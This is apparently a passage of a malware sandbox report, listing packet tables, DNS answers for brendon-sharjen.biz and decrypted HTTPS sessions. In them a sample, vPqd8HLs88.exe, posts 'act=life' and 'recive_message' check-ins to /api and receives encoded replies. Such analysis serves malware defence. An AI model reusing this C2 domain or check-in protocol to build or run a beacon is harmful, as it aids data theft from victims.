Dec 12, 2024 14:26:21.761358023 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.905638933 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.905683041 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.905788898 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.906074047 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.906090975 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:23.132612944 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:23.132759094 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:23.134054899 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:23.134064913 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:23.134315014 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:23.138927937 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:23.139647007 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:23.139679909 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:24.296983004 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:24.297095060 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:24.297154903 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:24.297254086 CET	49704	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:24.297278881 CET	443	49704	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:24.470886946 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:24.470927000 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:24.471045971 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:24.471379995 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:24.471396923 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:25.684262037 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:25.684334993 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:25.685792923 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:25.685815096 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:25.686077118 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:25.688298941 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:25.688539028 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:25.688576937 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:25.688628912 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:25.735336065 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:26.800087929 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:26.800185919 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:26.800295115 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:26.800385952 CET	49705	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:26.800400019 CET	443	49705	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:27.045500994 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:27.045552015 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:27.045670033 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:27.045989037 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:27.046004057 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:28.259215117 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:28.259337902 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:28.260853052 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:28.260859966 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:28.261130095 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:28.262362957 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:28.262491941 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:28.262545109 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:28.262624025 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:28.262631893 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:30.059890032 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:30.060013056 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:30.060098886 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:30.060261965 CET	49706	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:30.060276985 CET	443	49706	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:30.465346098 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:30.465408087 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:30.465509892 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:30.465846062 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:30.465878963 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:31.679677963 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:31.679753065 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:31.681781054 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:31.681790113 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:31.682178020 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:31.683446884 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:31.683547974 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:31.683553934 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:32.648336887 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:32.648425102 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:32.648514986 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:32.648612976 CET	49707	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:32.648634911 CET	443	49707	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:32.751318932 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:32.751379013 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:32.751460075 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:32.751818895 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:32.751832008 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:33.967324018 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:33.967403889 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:33.969002008 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:33.969037056 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:33.969325066 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:33.970504999 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:33.970571995 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:33.970585108 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:34.722676992 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:34.722775936 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:34.722855091 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:34.722996950 CET	49709	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:34.723012924 CET	443	49709	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:34.820112944 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:34.820158005 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:34.820235968 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:34.820543051 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:34.820557117 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:36.031996012 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:36.032073975 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:36.033328056 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:36.033341885 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:36.033596992 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:36.041675091 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:36.041695118 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:36.041754007 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:37.268234015 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:37.268327951 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:37.268376112 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:37.268836021 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:37.268851995 CET	443	49711	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:37.268862963 CET	49711	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:37.268867970 CET	443	49711	104.21.32.1	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 14:26:17.083364964 CET	61720	53	192.168.2.10	1.1.1.1
Dec 12, 2024 14:26:17.420448065 CET	53	61720	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 14:26:17.083364964 CET	192.168.2.10	1.1.1.1	0xbb66	Standard query (0)	brendon-sharjen.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 14:26:17.420448065 CET	1.1.1.1	192.168.2.10	0xbb66	No error (0)	brendon-sharjen.biz	104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 12, 2024 14:26:17.420448065 CET	1.1.1.1	192.168.2.10	0xbb66	No error (0)	brendon-sharjen.biz	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 12, 2024 14:26:17.420448065 CET	1.1.1.1	192.168.2.10	0xbb66	No error (0)	brendon-sharjen.biz	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 12, 2024 14:26:17.420448065 CET	1.1.1.1	192.168.2.10	0xbb66	No error (0)	brendon-sharjen.biz	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 12, 2024 14:26:17.420448065 CET	1.1.1.1	192.168.2.10	0xbb66	No error (0)	brendon-sharjen.biz	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 12, 2024 14:26:17.420448065 CET	1.1.1.1	192.168.2.10	0xbb66	No error (0)	brendon-sharjen.biz	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 12, 2024 14:26:17.420448065 CET	1.1.1.1	192.168.2.10	0xbb66	No error (0)	brendon-sharjen.biz	104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

brendon-sharjen.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49702	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:18 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: brendon-sharjen.biz
2024-12-12 13:26:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-12 13:26:19 UTC	1007	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gdne2idnrdf3llgvj6k38hhebu; expires=Mon, 07-Apr-2025 07:12:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g9XCiU2PSTRQoN4CVPKjhXtRJiHdYzGxz6wlgrR1WCcTDyfq306czVoUf6MRbSuiVvtBLNwBRKcU7CeBHNzoRjIEdcATsAVjQVmTZHisLjfoJtQFo9AgXp9PH0Yc3chdvxl9SMox"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0ba05f927cac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1817&rtt_var=729&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1452736&cwnd=197&unsent_bytes=0&cid=1abc054e7f1cbfe8&ts=736&x=0"
2024-12-12 13:26:19 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-12 13:26:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49703	104.21.32.1	443	7868	C:\Users\user\Desktop\vPqd8HLs88.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 13:26:20 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: brendon-sharjen.biz
2024-12-12 13:26:20 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--5defa06fc6ab&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-12 13:26:21 UTC	1011	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 13:26:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=flh6uqpcuk4p8f0r4per1flh45; expires=Mon, 07-Apr-2025 07:13:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLNOCQ296qsZ8cIC16Idu8n9MDwQi4XRul7y0xWsXiUu8CYpfjxF2RKLm5eCgIx8NX2Nnfpme4u2RaLn%2FCKKgYTq%2BI9anyGRTIh8Q8IcZHYHGCbjQsyaiBTvSzOZsJoHzN74jrLC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0e0bad2d9e0f91-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1660&rtt_var=631&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=989&delivery_rate=1723730&cwnd=218&unsent_bytes=0&cid=83873bddfdd892bc&ts=885&x=0"
2024-12-12 13:26:21 UTC	358	IN	Data Raw: 63 63 61 0d 0a 56 77 51 4c 76 4f 4d 4e 30 62 4c 2b 79 41 71 6d 38 35 46 70 61 77 71 52 61 7a 57 39 4b 56 64 2b 67 30 2b 58 61 67 49 66 64 66 38 73 4a 6e 32 65 32 54 6e 39 6b 49 32 74 4b 4a 79 56 38 41 55 59 62 37 31 4a 56 4e 6b 4c 62 52 6a 69 49 2b 51 50 4c 6a 30 44 6b 6e 55 2b 62 64 32 50 66 72 53 65 33 4b 31 79 68 4d 6e 4b 45 6b 6c 76 2f 30 6b 50 6e 30 77 39 48 4f 49 6a 39 51 74 70 63 41 57 54 4e 47 78 6e 32 34 74 6f 73 74 61 66 70 47 66 44 6c 76 51 49 41 57 54 34 42 6c 33 51 43 33 74 63 35 6a 57 31 55 43 42 53 45 49 73 32 53 57 72 50 69 43 2b 73 6e 6f 58 71 62 38 6a 52 71 30 73 4b 62 2f 4d 48 55 39 6c 43 50 78 62 72 4b 2f 51 4f 61 47 38 63 6d 54 39 73 61 64 69 4b 59 72 76 43 6b 71 35 67 79 4a 44 2b 43 45 6b 6d 73 77 35 50 6e 78 4e 31 54 39 4d 75 35 42 Data Ascii: ccaVwQLvOMN0bL+yAqm85FpawqRazW9KVd+g0+XagIfdf8sJn2e2Tn9kI2tKJyV8AUYb71JVNkLbRjiI+QPLj0DknU+bd2PfrSe3K1yhMnKEklv/0kPn0w9HOIj9QtpcAWTNGxn24tostafpGfDlvQIAWT4Bl3QC3tc5jW1UCBSEIs2SWrPiC+snoXqb8jRq0sKb/MHU9lCPxbrK/QOaG8cmT9sadiKYrvCkq5gyJD+CEkmsw5PnxN1T9Mu5B
2024-12-12 13:26:21 UTC	1369	IN	Data Raw: 71 4a 6a 7a 35 54 68 41 41 42 6c 2f 67 6c 61 31 55 51 32 48 4f 59 6e 2f 77 64 71 65 52 71 51 4d 32 5a 70 6e 73 38 76 74 4d 6a 63 38 69 6a 6e 6c 4f 4d 4d 42 58 36 78 4d 78 66 41 42 53 78 63 35 69 47 31 55 43 42 31 45 70 34 32 62 57 62 64 69 57 53 68 30 49 36 73 5a 63 47 44 39 51 34 48 59 76 41 62 58 64 46 4e 4e 68 58 71 4a 50 41 50 5a 44 31 5a 33 54 4a 2b 4b 59 62 42 54 72 37 62 6b 4b 42 2f 78 4e 48 73 52 52 41 6f 39 41 55 58 68 77 73 78 48 65 55 73 38 51 5a 75 65 52 75 62 4f 32 74 6d 32 49 74 76 74 4e 71 55 6f 6d 6e 4a 6d 76 77 4c 44 47 58 33 44 31 76 65 54 6e 56 53 6f 53 72 74 53 44 67 39 4f 5a 6f 32 64 43 76 72 67 6d 47 39 31 34 72 71 64 34 71 49 73 77 77 46 4b 4b 74 4a 57 64 70 45 4a 78 33 7a 4b 50 73 61 62 48 67 52 6b 44 5a 6f 61 64 75 47 59 72 33 57 Data Ascii: qJjz5ThAABl/gla1UQ2HOYn/wdqeRqQM2Zpns8vtMjc8ijnlOMMBX6xMxfABSxc5iG1UCB1Ep42bWbdiWSh0I6sZcGD9Q4HYvAbXdFNNhXqJPAPZD1Z3TJ+KYbBTr7bkKB/xNHsRRAo9AUXhwsxHeUs8QZueRubO2tm2ItvtNqUomnJmvwLDGX3D1veTnVSoSrtSDg9OZo2dCvrgmG914rqd4qIswwFKKtJWdpEJx3zKPsabHgRkDZoaduGYr3W
2024-12-12 13:26:21 UTC	1369	IN	Data Raw: 71 49 73 77 77 46 4b 4b 74 4a 57 39 5a 4c 50 68 62 6c 4c 66 49 46 5a 58 34 51 6e 6a 68 68 59 39 43 47 61 37 2f 5a 6b 61 78 6f 77 35 58 32 47 51 78 68 2f 77 55 58 6b 51 73 79 42 4b 46 31 74 53 64 6e 61 78 53 79 4e 6e 64 67 6e 70 34 68 71 70 43 62 70 69 69 63 30 66 51 4f 41 57 50 31 41 56 66 4e 54 6a 73 58 34 43 66 7a 43 57 31 78 45 5a 30 30 5a 6d 2f 53 67 57 69 30 77 6f 36 76 62 74 61 62 73 30 56 4a 62 2b 74 4a 44 35 39 39 4a 51 76 77 4f 37 63 39 59 33 4d 5a 6d 69 4d 6d 64 70 43 59 4c 37 54 63 33 50 49 6f 7a 35 48 2f 44 41 46 75 39 77 46 59 30 45 49 6e 48 65 30 6a 35 77 39 67 64 42 6d 53 4f 57 39 6b 32 59 78 6b 75 64 32 59 72 57 6d 45 33 37 4d 4d 45 53 69 72 53 57 48 50 52 6a 6b 79 36 69 48 38 53 48 38 7a 44 74 30 79 61 69 6d 47 77 57 75 2f 32 4a 61 6c 59 Data Ascii: qIswwFKKtJW9ZLPhblLfIFZX4QnjhhY9CGa7/Zkaxow5X2GQxh/wUXkQsyBKF1tSdnaxSyNndgnp4hqpCbpiic0fQOAWP1AVfNTjsX4CfzCW1xEZ00Zm/SgWi0wo6vbtabs0VJb+tJD599JQvwO7c9Y3MZmiMmdpCYL7Tc3PIoz5H/DAFu9wFY0EInHe0j5w9gdBmSOW9k2Yxkud2YrWmE37MMESirSWHPRjky6iH8SH8zDt0yaimGwWu/2JalY
2024-12-12 13:26:21 UTC	185	IN	Data Raw: 4d 44 57 37 38 53 52 6d 66 54 43 31 63 75 57 33 61 4c 31 55 2f 4e 71 64 31 65 53 66 48 77 57 69 2f 6b 4d 54 71 5a 4d 65 64 2b 77 51 50 59 66 38 44 58 74 52 48 50 68 6a 74 4a 50 41 4f 59 58 67 53 6e 44 46 71 59 39 69 43 62 4c 7a 66 6b 36 49 6f 69 74 48 30 45 30 6b 77 73 79 78 41 31 45 55 7a 58 50 35 6a 37 45 68 6e 63 56 66 46 64 57 70 67 32 49 64 71 76 39 47 61 6f 6d 33 4d 6c 66 49 4e 44 32 76 38 44 56 4c 65 52 44 45 51 37 79 66 30 43 57 78 32 47 4a 59 77 4a 69 65 65 68 6e 66 7a 69 4e 79 62 61 39 4b 47 34 77 64 4a 64 37 30 51 46 39 68 48 64 55 0d 0a Data Ascii: MDW78SRmfTC1cuW3aL1U/Nqd1eSfHwWi/kMTqZMed+wQPYf8DXtRHPhjtJPAOYXgSnDFqY9iCbLzfk6IoitH0E0kwsyxA1EUzXP5j7EhncVfFdWpg2Idqv9Gaom3MlfIND2v8DVLeRDEQ7yf0CWx2GJYwJieehnfziNyba9KG4wdJd70QF9hHdU
2024-12-12 13:26:21 UTC	1369	IN	Data Raw: 33 36 34 32 0d 0a 53 68 4c 4f 63 43 61 6e 4d 53 6b 6a 42 6c 5a 74 6d 4d 61 62 2f 61 6c 61 4a 75 79 35 6a 68 43 41 56 6d 39 41 64 62 30 55 59 2f 48 2b 78 74 75 30 68 6e 5a 56 66 46 64 55 70 75 30 36 39 6b 76 39 66 63 74 53 62 64 30 66 51 48 53 54 43 7a 42 56 33 54 51 6a 55 56 35 43 58 2b 41 57 56 38 48 4a 67 32 59 47 54 52 69 48 32 35 30 35 4b 70 5a 4d 69 58 38 67 67 62 59 50 70 4a 47 5a 39 4d 4c 56 79 35 62 64 51 47 62 57 6b 51 6a 58 56 35 4a 38 66 42 61 4c 2b 51 78 4f 70 72 78 5a 37 77 43 67 52 75 2b 67 46 58 32 55 34 36 45 65 38 71 38 67 68 74 63 78 69 62 50 57 74 6c 31 59 39 6d 74 64 43 64 6f 43 69 4b 30 66 51 54 53 54 43 7a 4f 56 54 66 53 79 35 63 2f 6d 50 73 53 47 64 78 56 38 56 31 64 47 50 58 67 57 79 38 31 35 69 68 5a 4d 47 55 2f 41 67 41 62 66 6f Data Ascii: 3642ShLOcCanMSkjBlZtmMab/alaJuy5jhCAVm9Adb0UY/H+xtu0hnZVfFdUpu069kv9fctSbd0fQHSTCzBV3TQjUV5CX+AWV8HJg2YGTRiH2505KpZMiX8ggbYPpJGZ9MLVy5bdQGbWkQjXV5J8fBaL+QxOprxZ7wCgRu+gFX2U46Ee8q8ghtcxibPWtl1Y9mtdCdoCiK0fQTSTCzOVTfSy5c/mPsSGdxV8V1dGPXgWy815ihZMGU/AgAbfo
2024-12-12 13:26:21 UTC	1369	IN	Data Raw: 44 6c 63 75 57 33 30 42 47 39 2b 47 4a 34 32 5a 32 50 4d 6b 32 4f 36 32 4a 6d 6d 59 38 71 58 34 51 30 47 59 66 41 4b 58 74 68 44 4f 52 62 69 4b 72 56 47 49 48 6f 50 33 57 30 6d 53 73 6d 52 59 76 50 50 30 72 4d 6f 77 35 32 7a 55 30 6c 67 2f 67 46 64 32 30 77 34 47 2b 63 6b 35 77 46 6c 63 78 65 5a 50 6d 6c 76 32 6f 4a 76 6f 64 61 59 6f 6d 76 4a 6e 50 30 49 44 53 69 39 53 56 44 48 43 32 31 63 30 79 44 37 45 32 39 36 42 70 64 31 65 53 66 48 77 57 69 2f 6b 4d 54 71 62 4d 71 44 2b 41 6f 43 59 2f 30 4f 57 4e 70 42 4e 52 50 6c 4c 76 73 44 59 58 34 66 6b 44 68 6f 59 39 65 49 61 4c 2f 55 6d 2b 6f 6d 68 4a 62 72 53 31 45 6f 32 43 68 36 38 30 77 76 58 50 35 6a 37 45 68 6e 63 56 66 46 64 57 70 67 30 6f 74 6b 74 4e 71 53 6f 32 62 50 67 2b 45 49 44 57 76 36 43 6c 44 57 Data Ascii: DlcuW30BG9+GJ42Z2PMk2O62JmmY8qX4Q0GYfAKXthDORbiKrVGIHoP3W0mSsmRYvPP0rMow52zU0lg/gFd20w4G+ck5wFlcxeZPmlv2oJvodaYomvJnP0IDSi9SVDHC21c0yD7E296Bpd1eSfHwWi/kMTqbMqD+AoCY/0OWNpBNRPlLvsDYX4fkDhoY9eIaL/Um+omhJbrS1Eo2Ch680wvXP5j7EhncVfFdWpg0otktNqSo2bPg+EIDWv6ClDW
2024-12-12 13:26:21 UTC	1369	IN	Data Raw: 56 74 75 30 68 6e 5a 56 66 46 64 55 74 6c 32 61 68 6f 71 4a 43 44 35 48 47 45 6c 76 39 4c 55 53 6a 79 41 6c 33 51 52 6a 59 61 34 69 62 77 41 6d 46 36 48 35 41 6e 5a 57 62 52 68 57 2b 38 31 70 71 72 5a 38 4b 57 2b 67 6f 42 62 37 4e 48 46 39 68 54 64 55 53 68 41 2f 49 4c 5a 44 30 49 30 79 77 6d 62 74 4c 42 4e 2f 50 51 6c 71 42 69 79 70 48 30 47 51 39 68 38 77 70 46 33 45 30 39 47 75 30 68 2b 41 42 70 66 52 4b 57 4f 47 31 6b 32 49 46 6b 73 70 44 53 36 6d 2f 63 30 61 74 4c 4f 47 58 39 44 56 6e 63 57 7a 4a 63 2f 6d 50 73 53 47 64 78 56 38 56 31 61 57 44 4d 68 6d 71 37 32 5a 79 6b 59 63 32 57 39 77 67 49 62 50 38 47 58 74 78 44 4e 42 54 75 4c 76 55 44 61 48 63 57 6b 7a 41 6d 4a 35 36 47 64 2f 4f 49 33 49 56 72 77 5a 72 79 53 53 35 75 39 41 55 58 77 41 55 73 58 Data Ascii: Vtu0hnZVfFdUtl2ahoqJCD5HGElv9LUSjyAl3QRjYa4ibwAmF6H5AnZWbRhW+81pqrZ8KW+goBb7NHF9hTdUShA/ILZD0I0ywmbtLBN/PQlqBiypH0GQ9h8wpF3E09Gu0h+ABpfRKWOG1k2IFkspDS6m/c0atLOGX9DVncWzJc/mPsSGdxV8V1aWDMhmq72ZykYc2W9wgIbP8GXtxDNBTuLvUDaHcWkzAmJ56Gd/OI3IVrwZrySS5u9AUXwAUsX
2024-12-12 13:26:21 UTC	1369	IN	Data Raw: 59 49 6c 4d 63 69 54 49 6d 4a 35 36 48 4c 2b 75 41 30 75 70 73 31 64 47 72 57 31 73 7a 70 6c 6f 41 6a 78 6b 71 55 76 68 74 34 30 67 34 4c 31 6e 64 4a 79 59 78 6e 73 5a 73 6f 63 4b 61 71 58 37 48 31 73 30 31 43 6e 37 2b 42 6c 7a 65 64 51 73 79 37 43 7a 32 42 69 4a 4d 41 5a 41 6c 5a 57 7a 5a 76 31 47 39 31 34 69 74 5a 73 4b 52 73 30 56 4a 5a 37 4e 52 62 70 38 44 64 53 4f 76 62 65 31 49 4f 44 30 69 6e 6a 74 6f 62 73 69 51 49 70 44 47 6b 61 56 6a 78 64 47 39 53 77 38 6f 71 31 6b 5a 6e 30 38 6b 58 4c 6c 39 70 31 4d 31 4c 6b 44 4e 5a 33 6b 6e 78 38 46 35 38 34 6a 4f 35 43 6a 57 30 61 74 4c 54 6d 62 2b 43 46 54 52 53 43 63 4f 35 79 37 6a 43 79 64 44 4b 62 77 34 62 57 58 54 6a 6d 53 4e 37 72 32 6e 59 38 69 63 2f 41 41 33 56 75 59 4b 57 64 46 4d 49 77 32 68 59 37 Data Ascii: YIlMciTImJ56HL+uA0ups1dGrW1szploAjxkqUvht40g4L1ndJyYxnsZsocKaqX7H1s01Cn7+BlzedQsy7Cz2BiJMAZAlZWzZv1G914itZsKRs0VJZ7NRbp8DdSOvbe1IOD0injtobsiQIpDGkaVjxdG9Sw8oq1kZn08kXLl9p1M1LkDNZ3knx8F584jO5CjW0atLTmb+CFTRSCcO5y7jCydDKbw4bWXTjmSN7r2nY8ic/AA3VuYKWdFMIw2hY7
